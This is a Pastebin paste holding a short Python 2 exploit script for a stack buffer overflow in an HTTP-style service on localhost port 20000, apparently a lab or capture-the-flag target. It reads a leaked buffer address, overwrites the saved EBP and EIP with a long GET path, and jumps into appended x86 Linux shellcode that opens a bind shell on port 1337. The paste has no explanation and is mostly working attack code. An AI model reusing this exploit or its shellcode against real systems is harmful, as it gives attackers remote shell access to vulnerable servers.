Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from TCPClient import TCPClient
- import os
- import struct
- import sys
- con = TCPClient('127.0.0.1', 20000)
- hdr = con.recvline()
- bufAddr = int(hdr[21:31], 16)
- print "rcv>> %s" % (hdr)
- buf = ""
- buf += "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
- buf += "\x43\x52\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
- buf += "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
- buf += "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
- buf += "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
- buf += "\x89\xe1\xcd\x80"
- EBP = "AAAA"
- EIP = "BBBB"
- ESP = "CCCC"
- dummyPath = "/" + 135 * "A" + EBP + EIP + ESP
- dummyReq = 'GET %s HTTP/1.1' % (dummyPath)
- shellcodePtr = bufAddr + len(dummyReq)
- EIP = struct.pack('<L', shellcodePtr)
- p = "/" + 135 * "A" + EBP + EIP + ESP
- req = 'GET %s HTTP/1.1' % (p)
- total = req + buf
- con.send(total)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement